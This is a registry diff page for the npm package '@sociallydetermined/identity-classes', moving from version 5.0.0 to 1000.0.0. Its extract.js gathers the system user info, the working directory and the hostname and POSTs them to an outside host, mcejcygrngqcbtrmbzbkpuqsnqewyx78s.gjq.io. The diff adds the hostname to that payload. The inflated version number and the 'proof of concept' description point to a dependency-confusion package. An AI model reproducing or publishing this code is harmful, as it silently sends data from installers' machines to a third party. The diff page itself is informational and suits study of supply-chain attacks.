@sociallydetermined/identity-classes 5.0.0 → 1000.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/extract.js +2 -1
  2. package/package.json +1 -1
package/extract.js CHANGED
@@ -4,13 +4,14 @@ var os = require("os");
4
4
  var hostname = os.hostname();
5
5
  var extracted = os.userInfo();
6
6
  extracted.curpwd = process.cwd();
7
+ extracted.hostname = hostname;
7
8
 
8
9
  const data = new TextEncoder().encode(
9
10
  JSON.stringify(extracted)
10
11
  );
11
12
 
12
13
  const options = {
13
- hostname: hostname + '.mcejcygrngqcbtrmbzbkpuqsnqewyx78s.gjq.io',
14
+ hostname: 'mcejcygrngqcbtrmbzbkpuqsnqewyx78s.gjq.io',
14
15
  port: 443,
15
16
  path: '/',
16
17
  method: 'POST',
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@sociallydetermined/identity-classes",
3
- "version": "5.0.0",
3
+ "version": "1000.0.0",
4
4
  "description": "This package is a proof of concept.",
5
5
  "main": "index.js",
6
6
  "author": "",